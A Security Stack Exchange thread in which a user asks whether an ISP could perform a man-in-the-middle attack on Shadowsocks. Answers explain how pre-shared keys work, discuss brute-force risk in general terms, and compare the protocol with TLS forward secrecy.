1

Shadowsocks is a secure SOCKS5 proxy which utilises various ciphers (default AES-256-cfb) to protect the traffic in transit.

Shadowsocks uses symmetric encryption and, according to the site the server provides no messages back to the client if the shared secret is incorrect.

Therefore if my ISP wanted to perform an MITM attack they would need to compile a new version of Shadowsocks that accepts any shared secret (since they don't know what my shared secret is) and then spoof the IP of the original server I was connecting to, thereby capturing my traffic.

Is my thinking correct? Does this mean that all symmetrically encrypted network streams are mitm-able?

Hilton D
  • 109
  • 7
  • No, because symmetric encryption is only used when both parties have agreed upton a shared secret. – Yorick de Wid Aug 28 '16 at 12:43
  • Yes, both parties have agreed on a pre-shared secret. The client is not aware if the password is incorrect...perhaps I don't understand the internals enough to understand but any help for my understanding would be appreicated.. – Hilton D Aug 28 '16 at 13:09

1 Answers1

3

... need to compile a new version of Shadowsocks that accepts any shared secret (since they don't know what my shared secret is) and then spoof the IP of the original server I was connecting to, thereby capturing my traffic.

There is no such thing as "accept any shared secret" by the server. The secret is not transferred inside the connection but it is a pre-shared secret, i.e. client and server are configured with this secret and only after this is done the first connection can be established.

Thus the ISP can only MITM the connection if he gets access to the secret, either by hacking into client or server or by brute-forcing. From a look at the python source code brute-forcing is not that impossible in my opinion since the ISP can easily know some plain text data (web requests and response have a typical structure) and can pre-build a dictionary of passphrase to encryption key used to speed up the cracking since the same passphrase always results in the same encryption key.

Steffen Ullrich
  • 184,332
  • 29
  • 363
  • 424
  • Which is why Shadowsocks is not good as an VPN. It was designed to bypass firewalls – Yorick de Wid Aug 28 '16 at 13:35
  • Thanks for your answers. How can I gauge how long it would take to brute-force? If I use a sufficiently long & random password (48 random chars) are we talking weeks / months / years / lifetimes to crack it? – Hilton D Sep 04 '16 at 13:28
  • @HiltonD: this depends on how much resources your enemy is investing :). But if your password is that long and really random there is probably only brute force possible which is really expensive in terms of time. In this case you are probably safe for lots of years. But also note that the security of the system fully depends on this password. If your enemies manage to get it (hack the server or [the brutal way](https://xkcd.com/538/)) they can decrypt even old communication they might have sniffed. TLS with forward secrecy ciphers is much better in this regard. – Steffen Ullrich Sep 04 '16 at 13:37